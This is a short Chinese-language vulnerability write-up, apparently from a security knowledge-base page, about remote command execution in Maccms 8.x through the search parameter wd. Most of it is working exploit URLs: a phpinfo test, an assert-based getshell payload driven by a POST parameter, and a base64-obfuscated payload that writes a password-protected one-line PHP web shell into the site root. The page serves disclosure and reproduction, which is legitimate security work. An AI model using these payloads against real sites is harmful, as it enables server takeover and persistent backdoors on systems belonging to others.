menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Maccms 8.x(苹果cms)命令执行漏洞 chevron_right Maccms 8.x(苹果cms)命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Maccms 8.x(苹果cms)命令执行漏洞.md
    928 B / 2021-07-15 19:56:21
        Maccms 8.x(苹果cms)命令执行漏洞
    ===============================
    
    一、漏洞简介
    ------------
    
    搜索页面搜索参数过滤不严 导致直接eval执行PHP语句,前台命令执行可getshell
    
    二、漏洞影响
    ------------
    
    Maccms 8.x
    
    三、复现过程
    ------------
    
    payload:
    
        http://0-sec.org/index.php?m=vod-search&wd={if-A:phpinfo()}{endif-A}
    
    ![](./resource/Maccms8.x(苹果cms)命令执行漏洞/media/rId24.png)
    
    getshell payload(a):
    
        http://0-sec.org/index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A}
    
        POST
    
        a=phpinfo()
    
    ![](./resource/Maccms8.x(苹果cms)命令执行漏洞/media/rId25.png)
    
    写入网站根目录一句话木马文件payload(文件名:test.php,密码:test):
    
        http://0-sec.org/index.php?m=vod-search&wd={if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW3Rlc3RdKTsgPz4%29%29)}{endif-A
    
    
    links
    file_download